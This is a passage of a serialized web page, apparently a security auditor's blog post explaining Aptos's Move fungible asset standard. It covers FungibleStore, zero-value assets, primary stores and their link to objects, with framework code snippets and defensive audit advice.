stores",{"type":27,"tag":36,"props":69294,"children":69295},{},[69296],{"type":33,"value":69297},"As mentioned, fungible assets are hot potatoes, meaning they must be destroyed after each transaction. If they lack abilities, how can they be used?",{"type":27,"tag":36,"props":69299,"children":69300},{},[69301,69303,69309],{"type":33,"value":69302},"Meet the ",{"type":27,"tag":84,"props":69304,"children":69306},{"className":69305},[],[69307],{"type":33,"value":69308},"FungibleStore",{"type":33,"value":1041},{"type":27,"tag":101,"props":69311,"children":69313},{"className":10270,"code":69312,"language":10269,"meta":7,"style":7},"struct FungibleStore has key {\n metadata: Object\u003CMetadata>,\n balance: u64,\n frozen: bool,\n}\n",[69314],{"type":27,"tag":84,"props":69315,"children":69316},{"__ignoreMap":7},[69317,69341,69368,69388,69407],{"type":27,"tag":207,"props":69318,"children":69319},{"class":209,"line":210},[69320,69324,69329,69333,69337],{"type":27,"tag":207,"props":69321,"children":69322},{"style":214},[69323],{"type":33,"value":16677},{"type":27,"tag":207,"props":69325,"children":69326},{"style":8920},[69327],{"type":33,"value":69328}," FungibleStore",{"type":27,"tag":207,"props":69330,"children":69331},{"style":220},[69332],{"type":33,"value":16686},{"type":27,"tag":207,"props":69334,"children":69335},{"style":220},[69336],{"type":33,"value":13213},{"type":27,"tag":207,"props":69338,"children":69339},{"style":238},[69340],{"type":33,"value":384},{"type":27,"tag":207,"props":69342,"children":69343},{"class":209,"line":244},[69344,69348,69352,69356,69360,69364],{"type":27,"tag":207,"props":69345,"children":69346},{"style":220},[69347],{"type":33,"value":68784},{"type":27,"tag":207,"props":69349,"children":69350},{"style":226},[69351],{"type":33,"value":736},{"type":27,"tag":207,"props":69353,"children":69354},{"style":8920},[69355],{"type":33,"value":68793},{"type":27,"tag":207,"props":69357,"children":69358},{"style":238},[69359],{"type":33,"value":9257},{"type":27,"tag":207,"props":69361,"children":69362},{"style":8920},[69363],{"type":33,"value":68802},{"type":27,"tag":207,"props":69365,"children":69366},{"style":238},[69367],{"type":33,"value":13420},{"type":27,"tag":207,"props":69369,"children":69370},{"class":209,"line":270},[69371,69376,69380,69384],{"type":27,"tag":207,"props":69372,"children":69373},{"style":220},[69374],{"type":33,"value":69375}," balance",{"type":27,"tag":207,"props":69377,"children":69378},{"style":226},[69379],{"type":33,"value":736},{"type":27,"tag":207,"props":69381,"children":69382},{"style":8920},[69383],{"type":33,"value":13142},{"type":27,"tag":207,"props":69385,"children":69386},{"style":238},[69387],{"type":33,"value":1842},{"type":27,"tag":207,"props":69389,"children":69390},{"class":209,"line":296},[69391,69395,69399,69403],{"type":27,"tag":207,"props":69392,"children":69393},{"style":220},[69394],{"type":33,"value":68445},{"type":27,"tag":207,"props":69396,"children":69397},{"style":226},[69398],{"type":33,"value":736},{"type":27,"tag":207,"props":69400,"children":69401},{"style":8920},[69402],{"type":33,"value":19327},{"type":27,"tag":207,"props":69404,"children":69405},{"style":238},[69406],{"type":33,"value":1842},{"type":27,"tag":207,"props":69408,"children":69409},{"class":209,"line":445},[69410],{"type":27,"tag":207,"props":69411,"children":69412},{"style":238},[69413],{"type":33,"value":451},{"type":27,"tag":36,"props":69415,"children":69416},{},[69417,69422,69424,69429,69431,69436,69438,69443,69445,69450],{"type":27,"tag":84,"props":69418,"children":69420},{"className":69419},[],[69421],{"type":33,"value":69308},{"type":33,"value":69423}," manages balances and metadata instead of holding the actual ",{"type":27,"tag":84,"props":69425,"children":69427},{"className":69426},[],[69428],{"type":33,"value":68743},{"type":33,"value":69430}," (it can't because ",{"type":27,"tag":84,"props":69432,"children":69434},{"className":69433},[],[69435],{"type":33,"value":68743},{"type":33,"value":69437}," doesn't have ",{"type":27,"tag":84,"props":69439,"children":69441},{"className":69440},[],[69442],{"type":33,"value":13222},{"type":33,"value":69444},"). Withdrawals create temporary ",{"type":27,"tag":84,"props":69446,"children":69448},{"className":69447},[],[69449],{"type":33,"value":68743},{"type":33,"value":69451}," resources, while deposits destroy them and update the balance. This design prevents freezing bypasses and improves observability.",{"type":27,"tag":26063,"props":69453,"children":69454},{},[],{"type":27,"tag":36,"props":69456,"children":69457},{},[69458,69460,69465,69467,69472],{"type":33,"value":69459},"A curious reader might wonder, is there any other way to create or destroy a ",{"type":27,"tag":84,"props":69461,"children":69463},{"className":69462},[],[69464],{"type":33,"value":68743},{"type":33,"value":69466}," besides withdrawing, depositing or minting it? There is — anyone can create and destroy a zero-value ",{"type":27,"tag":84,"props":69468,"children":69470},{"className":69469},[],[69471],{"type":33,"value":68743},{"type":33,"value":1041},{"type":27,"tag":101,"props":69474,"children":69476},{"className":10270,"code":69475,"language":10269,"meta":7,"style":7},"public fun destroy_zero(fungible_asset: FungibleAsset) {\n let FungibleAsset { amount, metadata: _ } = fungible_asset;\n assert!(amount == 0, error::invalid_argument(EAMOUNT_IS_NOT_ZERO));\n}\n\npublic fun zero\u003CT: key>(metadata: Object\u003CT>): FungibleAsset {\n FungibleAsset {\n metadata: object::convert(metadata),\n amount: 0,\n }\n}\n",[69477],{"type":27,"tag":84,"props":69478,"children":69479},{"__ignoreMap":7},[69480,69517,69569,69612,69619,69626,69698,69710,69748,69767,69774],{"type":27,"tag":207,"props":69481,"children":69482},{"class":209,"line":210},[69483,69487,69491,69496,69500,69505,69509,69513],{"type":27,"tag":207,"props":69484,"children":69485},{"style":220},[69486],{"type":33,"value":68907},{"type":27,"tag":207,"props":69488,"children":69489},{"style":220},[69490],{"type":33,"value":13489},{"type":27,"tag":207,"props":69492,"children":69493},{"style":1335},[69494],{"type":33,"value":69495}," destroy_zero",{"type":27,"tag":207,"props":69497,"children":69498},{"style":238},[69499],{"type":33,"value":1343},{"type":27,"tag":207,"props":69501,"children":69502},{"style":220},[69503],{"type":33,"value":69504},"fungible_asset",{"type":27,"tag":207,"props":69506,"children":69507},{"style":226},[69508],{"type":33,"value":736},{"type":27,"tag":207,"props":69510,"children":69511},{"style":8920},[69512],{"type":33,"value":68772},{"type":27,"tag":207,"props":69514,"children":69515},{"style":238},[69516],{"type":33,"value":1424},{"type":27,"tag":207,"props":69518,"children":69519},{"class":209,"line":244},[69520,69524,69528,69532,69536,69540,69545,69549,69553,69557,69561,69565],{"type":27,"tag":207,"props":69521,"children":69522},{"style":214},[69523],{"type":33,"value":10290},{"type":27,"tag":207,"props":69525,"children":69526},{"style":8920},[69527],{"type":33,"value":68772},{"type":27,"tag":207,"props":69529,"children":69530},{"style":238},[69531],{"type":33,"value":16862},{"type":27,"tag":207,"props":69533,"children":69534},{"style":220},[69535],{"type":33,"value":27578},{"type":27,"tag":207,"props":69537,"children":69538},{"style":238},[69539],{"type":33,"value":1123},{"type":27,"tag":207,"props":69541,"children":69542},{"style":220},[69543],{"type":33,"value":69544},"metadata",{"type":27,"tag":207,"props":69546,"children":69547},{"style":226},[69548],{"type":33,"value":736},{"type":27,"tag":207,"props":69550,"children":69551},{"style":220},[69552],{"type":33,"value":10326},{"type":27,"tag":207,"props":69554,"children":69555},{"style":238},[69556],{"type":33,"value":43452},{"type":27,"tag":207,"props":69558,"children":69559},{"style":226},[69560],{"type":33,"value":10380},{"type":27,"tag":207,"props":69562,"children":69563},{"style":220},[69564],{"type":33,"value":69039},{"type":27,"tag":207,"props":69566,"children":69567},{"style":238},[69568],{"type":33,"value":241},{"type":27,"tag":207,"props":69570,"children":69571},{"class":209,"line":270},[69572,69577,69581,69585,69589,69593,69598,69602,69607],{"type":27,"tag":207,"props":69573,"children":69574},{"style":1335},[69575],{"type":33,"value":69576}," assert!",{"type":27,"tag":207,"props":69578,"children":69579},{"style":238},[69580],{"type":33,"value":1343},{"type":27,"tag":207,"props":69582,"children":69583},{"style":220},[69584],{"type":33,"value":27578},{"type":27,"tag":207,"props":69586,"children":69587},{"style":226},[69588],{"type":33,"value":10572},{"type":27,"tag":207,"props":69590,"children":69591},{"style":232},[69592],{"type":33,"value":4680},{"type":27,"tag":207,"props":69594,"children":69595},{"style":238},[69596],{"type":33,"value":69597},", error",{"type":27,"tag":207,"props":69599,"children":69600},{"style":226},[69601],{"type":33,"value":10768},{"type":27,"tag":207,"props":69603,"children":69604},{"style":1335},[69605],{"type":33,"value":69606},"invalid_argument",{"type":27,"tag":207,"props":69608,"children":69609},{"style":238},[69610],{"type":33,"value":69611},"(EAMOUNT_IS_NOT_ZERO));\n",{"type":27,"tag":207,"props":69613,"children":69614},{"class":209,"line":296},[69615],{"type":27,"tag":207,"props":69616,"children":69617},{"style":238},[69618],{"type":33,"value":451},{"type":27,"tag":207,"props":69620,"children":69621},{"class":209,"line":445},[69622],{"type":27,"tag":207,"props":69623,"children":69624},{"emptyLinePlaceholder":19},[69625],{"type":33,"value":2062},{"type":27,"tag":207,"props":69627,"children":69628},{"class":209,"line":867},[69629,69633,69637,69642,69646,69650,69654,69658,69662,69666,69670,69674,69678,69682,69686,69690,69694],{"type":27,"tag":207,"props":69630,"children":69631},{"style":220},[69632],{"type":33,"value":68907},{"type":27,"tag":207,"props":69634,"children":69635},{"style":220},[69636],{"type":33,"value":13489},{"type":27,"tag":207,"props":69638,"children":69639},{"style":220},[69640],{"type":33,"value":69641}," zero",{"type":27,"tag":207,"props":69643,"children":69644},{"style":238},[69645],{"type":33,"value":9257},{"type":27,"tag":207,"props":69647,"children":69648},{"style":8920},[69649],{"type":33,"value":13269},{"type":27,"tag":207,"props":69651,"children":69652},{"style":226},[69653],{"type":33,"value":736},{"type":27,"tag":207,"props":69655,"children":69656},{"style":220},[69657],{"type":33,"value":13213},{"type":27,"tag":207,"props":69659,"children":69660},{"style":238},[69661],{"type":33,"value":14893},{"type":27,"tag":207,"props":69663,"children":69664},{"style":220},[69665],{"type":33,"value":69544},{"type":27,"tag":207,"props":69667,"children":69668},{"style":226},[69669],{"type":33,"value":736},{"type":27,"tag":207,"props":69671,"children":69672},{"style":8920},[69673],{"type":33,"value":68793},{"type":27,"tag":207,"props":69675,"children":69676},{"style":238},[69677],{"type":33,"value":9257},{"type":27,"tag":207,"props":69679,"children":69680},{"style":8920},[69681],{"type":33,"value":13269},{"type":27,"tag":207,"props":69683,"children":69684},{"style":238},[69685],{"type":33,"value":15670},{"type":27,"tag":207,"props":69687,"children":69688},{"style":226},[69689],{"type":33,"value":736},{"type":27,"tag":207,"props":69691,"children":69692},{"style":8920},[69693],{"type":33,"value":68772},{"type":27,"tag":207,"props":69695,"children":69696},{"style":238},[69697],{"type":33,"value":384},{"type":27,"tag":207,"props":69699,"children":69700},{"class":209,"line":892},[69701,69706],{"type":27,"tag":207,"props":69702,"children":69703},{"style":8920},[69704],{"type":33,"value":69705}," FungibleAsset",{"type":27,"tag":207,"props":69707,"children":69708},{"style":238},[69709],{"type":33,"value":384},{"type":27,"tag":207,"props":69711,"children":69712},{"class":209,"line":1475},[69713,69718,69722,69727,69731,69736,69740,69744],{"type":27,"tag":207,"props":69714,"children":69715},{"style":220},[69716],{"type":33,"value":69717}," metadata",{"type":27,"tag":207,"props":69719,"children":69720},{"style":226},[69721],{"type":33,"value":736},{"type":27,"tag":207,"props":69723,"children":69724},{"style":238},[69725],{"type":33,"value":69726}," object",{"type":27,"tag":207,"props":69728,"children":69729},{"style":226},[69730],{"type":33,"value":10768},{"type":27,"tag":207,"props":69732,"children":69733},{"style":1335},[69734],{"type":33,"value":69735},"convert",{"type":27,"tag":207,"props":69737,"children":69738},{"style":238},[69739],{"type":33,"value":1343},{"type":27,"tag":207,"props":69741,"children":69742},{"style":220},[69743],{"type":33,"value":69544},{"type":27,"tag":207,"props":69745,"children":69746},{"style":238},[69747],{"type":33,"value":14018},{"type":27,"tag":207,"props":69749,"children":69750},{"class":209,"line":2065},[69751,69755,69759,69763],{"type":27,"tag":207,"props":69752,"children":69753},{"style":220},[69754],{"type":33,"value":14731},{"type":27,"tag":207,"props":69756,"children":69757},{"style":226},[69758],{"type":33,"value":736},{"type":27,"tag":207,"props":69760,"children":69761},{"style":232},[69762],{"type":33,"value":4680},{"type":27,"tag":207,"props":69764,"children":69765},{"style":238},[69766],{"type":33,"value":1842},{"type":27,"tag":207,"props":69768,"children":69769},{"class":209,"line":2092},[69770],{"type":27,"tag":207,"props":69771,"children":69772},{"style":238},[69773],{"type":33,"value":10645},{"type":27,"tag":207,"props":69775,"children":69776},{"class":209,"line":2130},[69777],{"type":27,"tag":207,"props":69778,"children":69779},{"style":238},[69780],{"type":33,"value":451},{"type":27,"tag":36,"props":69782,"children":69783},{},[69784],{"type":33,"value":69785},"In theory, this shouldn’t pose a problem. After all, having zero of something doesn’t exactly qualify as ownership.",{"type":27,"tag":36,"props":69787,"children":69788},{},[69789,69791,69796],{"type":33,"value":69790},"In practice, the ability to freely mint and burn zero ",{"type":27,"tag":84,"props":69792,"children":69794},{"className":69793},[],[69795],{"type":33,"value":68885},{"type":33,"value":69797}," of any type could present a significant risk. During our reviews, we enountered many protocols that did not account for this possibility, leading to arithmetic errors, DoS logic bugs or inaccurate calculations. Keep in mind that edge case, we'll come back to this.",{"type":27,"tag":58,"props":69799,"children":69801},{"id":69800},"primary-and-secondary-stores",[69802],{"type":33,"value":69803},"Primary and secondary stores",{"type":27,"tag":36,"props":69805,"children":69806},{},[69807,69813,69815,69821,69823,69828],{"type":27,"tag":84,"props":69808,"children":69810},{"className":69809},[],[69811],{"type":33,"value":69812},"FungibleStores",{"type":33,"value":69814}," in comparison to ",{"type":27,"tag":84,"props":69816,"children":69818},{"className":69817},[],[69819],{"type":33,"value":69820},"CoinStores",{"type":33,"value":69822}," are not unique. Each user can have multiple ",{"type":27,"tag":84,"props":69824,"children":69826},{"className":69825},[],[69827],{"type":33,"value":69308},{"type":33,"value":69829}," objects for a given token!",{"type":27,"tag":36,"props":69831,"children":69832},{},[69833,69835,69842,69844,69849],{"type":33,"value":69834},"A primary fungible store is maintained via the aptly named ",{"type":27,"tag":47,"props":69836,"children":69839},{"href":69837,"rel":69838},"https://github.com/aptos-labs/aptos-core/blob/2bea962eac4743db6cc0ae2e8a2fd7fcc323b121/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move",[51],[69840],{"type":33,"value":69841},"primary_fungible_store",{"type":33,"value":69843}," module. It's \"primary\" because of its deterministic location, which is calculated using the owner and the fungible asset's ",{"type":27,"tag":84,"props":69845,"children":69847},{"className":69846},[],[69848],{"type":33,"value":68802},{"type":33,"value":69850}," addresses. Users can also create a number of \"secondary\" fungible stores by themselves.",{"type":27,"tag":36,"props":69852,"children":69853},{},[69854],{"type":33,"value":69855},"One key feature of the primary fungible stores is their permissionless creation. This can lead to surprising denial of service bugs!",{"type":27,"tag":101,"props":69857,"children":69859},{"className":10270,"code":69858,"language":10269,"meta":7,"style":7},"public entry fun register(\n user: &signer, [...]\n) acquires [...] {\n [...]\n let wallet_store = create_primary_store(signer::address_of(sender), get_metadata());\n [...]\n}\n",[69860],{"type":27,"tag":84,"props":69861,"children":69862},{"__ignoreMap":7},[69863,69888,69920,69943,69959,70013,70028],{"type":27,"tag":207,"props":69864,"children":69865},{"class":209,"line":210},[69866,69870,69875,69879,69884],{"type":27,"tag":207,"props":69867,"children":69868},{"style":220},[69869],{"type":33,"value":68907},{"type":27,"tag":207,"props":69871,"children":69872},{"style":220},[69873],{"type":33,"value":69874}," entry",{"type":27,"tag":207,"props":69876,"children":69877},{"style":220},[69878],{"type":33,"value":13489},{"type":27,"tag":207,"props":69880,"children":69881},{"style":1335},[69882],{"type":33,"value":69883}," register",{"type":27,"tag":207,"props":69885,"children":69886},{"style":238},[69887],{"type":33,"value":9090},{"type":27,"tag":207,"props":69889,"children":69890},{"class":209,"line":244},[69891,69896,69900,69904,69908,69912,69916],{"type":27,"tag":207,"props":69892,"children":69893},{"style":220},[69894],{"type":33,"value":69895}," user",{"type":27,"tag":207,"props":69897,"children":69898},{"style":226},[69899],{"type":33,"value":736},{"type":27,"tag":207,"props":69901,"children":69902},{"style":226},[69903],{"type":33,"value":14423},{"type":27,"tag":207,"props":69905,"children":69906},{"style":220},[69907],{"type":33,"value":14428},{"type":27,"tag":207,"props":69909,"children":69910},{"style":238},[69911],{"type":33,"value":51384},{"type":27,"tag":207,"props":69913,"children":69914},{"style":226},[69915],{"type":33,"value":16867},{"type":27,"tag":207,"props":69917,"children":69918},{"style":238},[69919],{"type":33,"value":19050},{"type":27,"tag":207,"props":69921,"children":69922},{"class":209,"line":270},[69923,69927,69931,69935,69939],{"type":27,"tag":207,"props":69924,"children":69925},{"style":238},[69926],{"type":33,"value":2222},{"type":27,"tag":207,"props":69928,"children":69929},{"style":220},[69930],{"type":33,"value":13626},{"type":27,"tag":207,"props":69932,"children":69933},{"style":238},[69934],{"type":33,"value":30305},{"type":27,"tag":207,"props":69936,"children":69937},{"style":226},[69938],{"type":33,"value":16867},{"type":27,"tag":207,"props":69940,"children":69941},{"style":238},[69942],{"type":33,"value":68998},{"type":27,"tag":207,"props":69944,"children":69945},{"class":209,"line":296},[69946,69951,69955],{"type":27,"tag":207,"props":69947,"children":69948},{"style":238},[69949],{"type":33,"value":69950}," [",{"type":27,"tag":207,"props":69952,"children":69953},{"style":226},[69954],{"type":33,"value":16867},{"type":27,"tag":207,"props":69956,"children":69957},{"style":238},[69958],{"type":33,"value":19050},{"type":27,"tag":207,"props":69960,"children":69961},{"class":209,"line":445},[69962,69966,69971,69975,69980,69984,69988,69992,69996,70000,70004,70009],{"type":27,"tag":207,"props":69963,"children":69964},{"style":214},[69965],{"type":33,"value":10290},{"type":27,"tag":207,"props":69967,"children":69968},{"style":220},[69969],{"type":33,"value":69970}," wallet_store",{"type":27,"tag":207,"props":69972,"children":69973},{"style":226},[69974],{"type":33,"value":229},{"type":27,"tag":207,"props":69976,"children":69977},{"style":1335},[69978],{"type":33,"value":69979}," create_primary_store",{"type":27,"tag":207,"props":69981,"children":69982},{"style":238},[69983],{"type":33,"value":14482},{"type":27,"tag":207,"props":69985,"children":69986},{"style":226},[69987],{"type":33,"value":10768},{"type":27,"tag":207,"props":69989,"children":69990},{"style":1335},[69991],{"type":33,"value":14491},{"type":27,"tag":207,"props":69993,"children":69994},{"style":238},[69995],{"type":33,"value":1343},{"type":27,"tag":207,"props":69997,"children":69998},{"style":220},[69999],{"type":33,"value":69093},{"type":27,"tag":207,"props":70001,"children":70002},{"style":238},[70003],{"type":33,"value":22452},{"type":27,"tag":207,"props":70005,"children":70006},{"style":1335},[70007],{"type":33,"value":70008},"get_metadata",{"type":27,"tag":207,"props":70010,"children":70011},{"style":238},[70012],{"type":33,"value":22700},{"type":27,"tag":207,"props":70014,"children":70015},{"class":209,"line":867},[70016,70020,70024],{"type":27,"tag":207,"props":70017,"children":70018},{"style":238},[70019],{"type":33,"value":69950},{"type":27,"tag":207,"props":70021,"children":70022},{"style":226},[70023],{"type":33,"value":16867},{"type":27,"tag":207,"props":70025,"children":70026},{"style":238},[70027],{"type":33,"value":19050},{"type":27,"tag":207,"props":70029,"children":70030},{"class":209,"line":892},[70031],{"type":27,"tag":207,"props":70032,"children":70033},{"style":238},[70034],{"type":33,"value":451},{"type":27,"tag":36,"props":70036,"children":70037},{},[70038,70039,70045,70047,70053],{"type":33,"value":23888},{"type":27,"tag":84,"props":70040,"children":70042},{"className":70041},[],[70043],{"type":33,"value":70044},"create_primary_store",{"type":33,"value":70046}," function can introduce DoS vulnerabilities because it aborts if the store already exists. Using ",{"type":27,"tag":84,"props":70048,"children":70050},{"className":70049},[],[70051],{"type":33,"value":70052},"ensure_primary_store_exists",{"type":33,"value":70054}," is recommended to avoid such issues.",{"type":27,"tag":28,"props":70056,"children":70058},{"id":70057},"fungible-assets-and-objects",[70059],{"type":33,"value":70060},"Fungible assets and objects",{"type":27,"tag":36,"props":70062,"children":70063},{},[70064,70066,70071,70073,70080],{"type":33,"value":70065},"The fungible asset standard is not a standalone module. It has heavy dependencies on a sibling module, the ",{"type":27,"tag":84,"props":70067,"children":70069},{"className":70068},[],[70070],{"type":33,"value":9262},{"type":33,"value":70072}," module, introduced in ",{"type":27,"tag":47,"props":70074,"children":70077},{"href":70075,"rel":70076},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-10.md",[51],[70078],{"type":33,"value":70079},"AIP-10",{"type":33,"value":1041},{"type":27,"tag":10222,"props":70082,"children":70083},{},[70084],{"type":27,"tag":36,"props":70085,"children":70086},{},[70087,70091],{"type":27,"tag":207,"props":70088,"children":70089},{},[70090],{"type":33,"value":68682},{"type":33,"value":70092}," proposes a standard for Fungible Assets (FA) using Move Objects. In this model, any on-chain asset represented as an object can also be expressed as a fungible asset allowing for a single object to be represented by many distinct, yet interchangeable units of ownership.",{"type":27,"tag":36,"props":70094,"children":70095},{},[70096],{"type":33,"value":70097},"These two modules are closely intertwined, and their connection can be surprisingly intricate.",{"type":27,"tag":58,"props":70099,"children":70101},{"id":70100},"creation-and-deletion",[70102],{"type":33,"value":70103},"Creation and deletion",{"type":27,"tag":36,"props":70105,"children":70106},{},[70107,70109,70115],{"type":33,"value":70108},"To create a fungible resource, an undeletable object must first be created. \"Undeletable\" means, that it's not possible to get a permission to delete it. This is verified in ",{"type":27,"tag":84,"props":70110,"children":70112},{"className":70111},[],[70113],{"type":33,"value":70114},"fungible_asset::add_fungibility",{"type":33,"value":736},{"type":27,"tag":101,"props":70117,"children":70119},{"className":10270,"code":70118,"language":10269,"meta":7,"style":7},"assert!(!object::can_generate_delete_ref(constructor_ref), error::invalid_argument(EOBJECT_IS_DELETABLE));\n",[70120],{"type":27,"tag":84,"props":70121,"children":70122},{"__ignoreMap":7},[70123],{"type":27,"tag":207,"props":70124,"children":70125},{"class":209,"line":210},[70126,70130,70134,70138,70143,70147,70152,70156,70161,70166,70170,70174],{"type":27,"tag":207,"props":70127,"children":70128},{"style":1335},[70129],{"type":33,"value":49229},{"type":27,"tag":207,"props":70131,"children":70132},{"style":238},[70133],{"type":33,"value":1343},{"type":27,"tag":207,"props":70135,"children":70136},{"style":226},[70137],{"type":33,"value":27893},{"type":27,"tag":207,"props":70139,"children":70140},{"style":238},[70141],{"type":33,"value":70142},"object",{"type":27,"tag":207,"props":70144,"children":70145},{"style":226},[70146],{"type":33,"value":10768},{"type":27,"tag":207,"props":70148,"children":70149},{"style":1335},[70150],{"type":33,"value":70151},"can_generate_delete_ref",{"type":27,"tag":207,"props":70153,"children":70154},{"style":238},[70155],{"type":33,"value":1343},{"type":27,"tag":207,"props":70157,"children":70158},{"style":220},[70159],{"type":33,"value":70160},"constructor_ref",{"type":27,"tag":207,"props":70162,"children":70163},{"style":238},[70164],{"type":33,"value":70165},"), error",{"type":27,"tag":207,"props":70167,"children":70168},{"style":226},[70169],{"type":33,"value":10768},{"type":27,"tag":207,"props":70171,"children":70172},{"style":1335},[70173],{"type":33,"value":69606},{"type":27,"tag":207,"props":70175,"children":70176},{"style":238},[70177],{"type":33,"value":70178},"(EOBJECT_IS_DELETABLE));\n",{"type":27,"tag":36,"props":70180,"children":70181},{},[70182,70184,70189,70191,70196,70197,70204],{"type":33,"value":70183},"This object serves as the foundation for ownership tokens in the form of a ",{"type":27,"tag":84,"props":70185,"children":70187},{"className":70186},[],[70188],{"type":33,"value":68743},{"type":33,"value":70190},". This means that allowing it to be deletable wouldn't make sense and would impact the usability of such fungible assets, restricting users from accessing critical functionalities such as creating new stores. In the past the ",{"type":27,"tag":84,"props":70192,"children":70194},{"className":70193},[],[70195],{"type":33,"value":70114},{"type":33,"value":13740},{"type":27,"tag":47,"props":70198,"children":70201},{"href":70199,"rel":70200},"https://github.com/aptos-labs/aptos-core/commit/6976f8e9004b0f6ebb6fd976410d695c5a5a7ace",[51],[70202],{"type":33,"value":70203},"lacked this assert",{"type":33,"value":70205},", which we discovered and reported.",{"type":27,"tag":36,"props":70207,"children":70208},{},[70209,70214,70216,70221,70223,70228],{"type":27,"tag":84,"props":70210,"children":70212},{"className":70211},[],[70213],{"type":33,"value":70114},{"type":33,"value":70215}," transfers the ",{"type":27,"tag":84,"props":70217,"children":70219},{"className":70218},[],[70220],{"type":33,"value":68802},{"type":33,"value":70222}," and associated resources to this new object. After that, with the appropriate permissions, the ",{"type":27,"tag":84,"props":70224,"children":70226},{"className":70225},[],[70227],{"type":33,"value":68743},{"type":33,"value":70229}," can be minted, representing a share of ownership in that object.",{"type":27,"tag":101,"props":70231,"children":70233},{"className":10270,"code":70232,"language":10269,"meta":7,"style":7},"/// Make an existing object fungible by adding the Metadata resource.\npublic fun add_fungibility(\n [...]\n): Object\u003CMetadata> {\n [...]\n move_to(metadata_object_signer,\n Metadata {\n name,\n symbol,\n decimals,\n icon_uri,\n project_uri,\n }\n );\n[...]\n}\n",[70234],{"type":27,"tag":84,"props":70235,"children":70236},{"__ignoreMap":7},[70237,70245,70265,70280,70307,70322,70343,70355,70367,70379,70391,70403,70415,70422,70429,70444],{"type":27,"tag":207,"props":70238,"children":70239},{"class":209,"line":210},[70240],{"type":27,"tag":207,"props":70241,"children":70242},{"style":4647},[70243],{"type":33,"value":70244},"/// Make an existing object fungible by adding the Metadata resource.\n",{"type":27,"tag":207,"props":70246,"children":70247},{"class":209,"line":244},[70248,70252,70256,70261],{"type":27,"tag":207,"props":70249,"children":70250},{"style":220},[70251],{"type":33,"value":68907},{"type":27,"tag":207,"props":70253,"children":70254},{"style":220},[70255],{"type":33,"value":13489},{"type":27,"tag":207,"props":70257,"children":70258},{"style":1335},[70259],{"type":33,"value":70260}," add_fungibility",{"type":27,"tag":207,"props":70262,"children":70263},{"style":238},[70264],{"type":33,"value":9090},{"type":27,"tag":207,"props":70266,"children":70267},{"class":209,"line":270},[70268,70272,70276],{"type":27,"tag":207,"props":70269,"children":70270},{"style":238},[70271],{"type":33,"value":69950},{"type":27,"tag":207,"props":70273,"children":70274},{"style":226},[70275],{"type":33,"value":16867},{"type":27,"tag":207,"props":70277,"children":70278},{"style":238},[70279],{"type":33,"value":19050},{"type":27,"tag":207,"props":70281,"children":70282},{"class":209,"line":296},[70283,70287,70291,70295,70299,70303],{"type":27,"tag":207,"props":70284,"children":70285},{"style":238},[70286],{"type":33,"value":10416},{"type":27,"tag":207,"props":70288,"children":70289},{"style":226},[70290],{"type":33,"value":736},{"type":27,"tag":207,"props":70292,"children":70293},{"style":8920},[70294],{"type":33,"value":68793},{"type":27,"tag":207,"props":70296,"children":70297},{"style":238},[70298],{"type":33,"value":9257},{"type":27,"tag":207,"props":70300,"children":70301},{"style":8920},[70302],{"type":33,"value":68802},{"type":27,"tag":207,"props":70304,"children":70305},{"style":238},[70306],{"type":33,"value":14563},{"type":27,"tag":207,"props":70308,"children":70309},{"class":209,"line":445},[70310,70314,70318],{"type":27,"tag":207,"props":70311,"children":70312},{"style":238},[70313],{"type":33,"value":69950},{"type":27,"tag":207,"props":70315,"children":70316},{"style":226},[70317],{"type":33,"value":16867},{"type":27,"tag":207,"props":70319,"children":70320},{"style":238},[70321],{"type":33,"value":19050},{"type":27,"tag":207,"props":70323,"children":70324},{"class":209,"line":867},[70325,70330,70334,70339],{"type":27,"tag":207,"props":70326,"children":70327},{"style":1335},[70328],{"type":33,"value":70329}," move_to",{"type":27,"tag":207,"props":70331,"children":70332},{"style":238},[70333],{"type":33,"value":1343},{"type":27,"tag":207,"props":70335,"children":70336},{"style":220},[70337],{"type":33,"value":70338},"metadata_object_signer",{"type":27,"tag":207,"props":70340,"children":70341},{"style":238},[70342],{"type":33,"value":1842},{"type":27,"tag":207,"props":70344,"children":70345},{"class":209,"line":892},[70346,70351],{"type":27,"tag":207,"props":70347,"children":70348},{"style":8920},[70349],{"type":33,"value":70350}," Metadata",{"type":27,"tag":207,"props":70352,"children":70353},{"style":238},[70354],{"type":33,"value":384},{"type":27,"tag":207,"props":70356,"children":70357},{"class":209,"line":1475},[70358,70363],{"type":27,"tag":207,"props":70359,"children":70360},{"style":220},[70361],{"type":33,"value":70362}," name",{"type":27,"tag":207,"props":70364,"children":70365},{"style":238},[70366],{"type":33,"value":1842},{"type":27,"tag":207,"props":70368,"children":70369},{"class":209,"line":2065},[70370,70375],{"type":27,"tag":207,"props":70371,"children":70372},{"style":220},[70373],{"type":33,"value":70374}," symbol",{"type":27,"tag":207,"props":70376,"children":70377},{"style":238},[70378],{"type":33,"value":1842},{"type":27,"tag":207,"props":70380,"children":70381},{"class":209,"line":2092},[70382,70387],{"type":27,"tag":207,"props":70383,"children":70384},{"style":220},[70385],{"type":33,"value":70386}," decimals",{"type":27,"tag":207,"props":70388,"children":70389},{"style":238},[70390],{"type":33,"value":1842},{"type":27,"tag":207,"props":70392,"children":70393},{"class":209,"line":2130},[70394,70399],{"type":27,"tag":207,"props":70395,"children":70396},{"style":220},[70397],{"type":33,"value":70398}," icon_uri",{"type":27,"tag":207,"props":70400,"children":70401},{"style":238},[70402],{"type":33,"value":1842},{"type":27,"tag":207,"props":70404,"children":70405},{"class":209,"line":2168},[70406,70411],{"type":27,"tag":207,"props":70407,"children":70408},{"style":220},[70409],{"type":33,"value":70410}," 